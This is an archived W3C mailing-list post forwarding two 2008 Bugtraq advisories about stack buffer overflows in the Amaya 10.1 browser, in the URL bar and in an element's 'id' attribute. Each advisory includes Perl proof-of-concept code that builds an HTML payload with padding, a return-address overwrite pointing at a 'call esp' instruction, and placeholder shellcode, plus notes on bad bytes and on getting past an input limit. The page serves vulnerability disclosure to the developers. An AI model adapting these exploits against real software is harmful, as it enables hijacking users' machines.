W3C home > Mailing lists > Public > www-amaya@w3.org > October to December 2008

stack overflows, from bugtraq

From: Thomas Roessler <tlr@w3.org>
Date: Mon, 24 Nov 2008 18:59:26 +0100
Message-Id: <C17EBD72-E497-4E8A-A556-1B577FACF6AA@w3.org>
To: www-amaya@w3.org

fyi
--
Thomas Roessler, W3C  <tlr@w3.org>







Begin forwarded message:

> From: writ3r@gmail.com
> Date: 24 November 2008 12:26:37 CEST
> To: bugtraq@securityfocus.com
> Subject: Amaya (URL Bar) Remote Stack Overflow Vulnerability
>
> #            W3C Amaya 10.1 Web Browser
> #
> # Amaya (URL Bar) Remote Stack Overflow Vulnerability
> #
> # Written and discovered by:
> # r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
> #
> # Advisory: http://www.bmgsec.com.au/advisory/40/
> # ------------------------------------------------------
> #
> # Shellcode notes:
> # The application fails to correctly process certain bytes:
> # 0x9c becomes 0x9cc2
> # Similar events occur with different bytes (0xf8, 0xfb, 0xbe, 0x93,  
> 0xab, 0xaf 0xeb).
> #
> # After reviewing the source code, the below function modifies the
> # shellcode:
> # Line 902: int TtaWCToMBstring (wchar_t src, unsigned char **dest)
> #
> # The max value which can be used is 0x1fffff <-- Thanks Luigi!
> # ------------------------------------------------------
> #
> # The URL bar contains a buffer overflow vulnerability:
> # buffer length: 1600 bytes
> #
> # [junk] + [eip] +     [shellcode]
> #  1600  +   4   +  sizeof(shellcode)
> #
> # ESP points to data after EIP.
> #
> # I found it difficult to access the URL bar via HTML code. For  
> example, compile the above code,
> # write it to a HTML file, then load it into the browser. Attempt to  
> click the link and
> # you will notice there is a 800 character limit on the link.
> #
> # To bypass this problem click the link then select "Links" >>  
> "Create or change link...".
> # Now click "Confirm". Alternatively just copy the payload into the  
> URL bar.
> #
> # URL Bar Proof of concept:
> # ----------------------------------------------------
> #!/usr/bin/perl
>
> use warnings;
> use strict;
>
> my $shellcode = 'C' x 80;
>
> # 0x7D035F53 -> \x53\x5f\x03\x7d <-- Bingo! (call esp)
> my $data   =       '<a href="' .
>                        'A' x 1600 .
>                        "\x53\x5f\x03\x7d" . # eip (ESP points to  
> stuff after RET, so shellcode)
>                        $shellcode .
>                        '">r0ut3r</a>';
> print $data;
>
Begin forwarded message:

> From: writ3r@gmail.com
> Date: 24 November 2008 12:28:28 CEST
> To: bugtraq@securityfocus.com
> Subject: Amaya (id) Remote Stack Overflow Vulnerability
>
> #            W3C Amaya 10.1 Web Browser
> #
> # Amaya (id) Remote Stack Overflow Vulnerability
> #
> # Written and discovered by:
> # r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
> #
> # Advisory: http://www.bmgsec.com.au/advisory/41/
> # ------------------------------------------------------
> #
> # Shellcode notes:
> # The application fails to correctly process certain bytes:
> # 0x9c becomes 0x9cc2
> # Similar events occur with different bytes (0xf8, 0xfb, 0xbe, 0x93,  
> 0xab, 0xaf 0xeb).
> #
> # After reviewing the source code, the below function modifies the
> # shellcode:
> # Line 902: int TtaWCToMBstring (wchar_t src, unsigned char **dest)
> #
> # The max value which can be used is 0x1fffff <-- Thanks Luigi!
> # ------------------------------------------------------
> #
> # The "id" variable of a tag contains a buffer overflow:
> # <div id=" 93*'A/' ">r0ut3r</div>
> #
> # The application will not overflow with normal alphanumeric  
> characters.
> # To fill the buffer I had to use "A/" repeated 91 times. Therefore  
> buffer length is:
> # 91 * 2 = 182 + 4
> #
> # [junk] + [eip] +     [shellcode]
> #  182   +   4   +  sizeof(shellcode)
> #
> # ESP points to data after EIP.
> #
> # "id" variable Proof of concept:
> #!/usr/bin/perl
>
> use warnings;
> use strict;
>
> my $shellcode = 'C' x 350;
>
> # 0x7D035F53 -> \x53\x5f\x03\x7d <-- Bingo! (call esp)
> my $data   =       '<div id="' .
>                        'A/' x 91 .
>                        "\x53\x5f\x03\x7d" . # eip (ESP points to  
> stuff after RET, so shellcode)
>                        $shellcode .
>                        '">test</div>';
> print $data;
>
Received on Monday, 24 November 2008 17:59:36 UTC

This archive was generated by hypermail 2.3.1 : Wednesday, 7 January 2015 14:53:40 UTC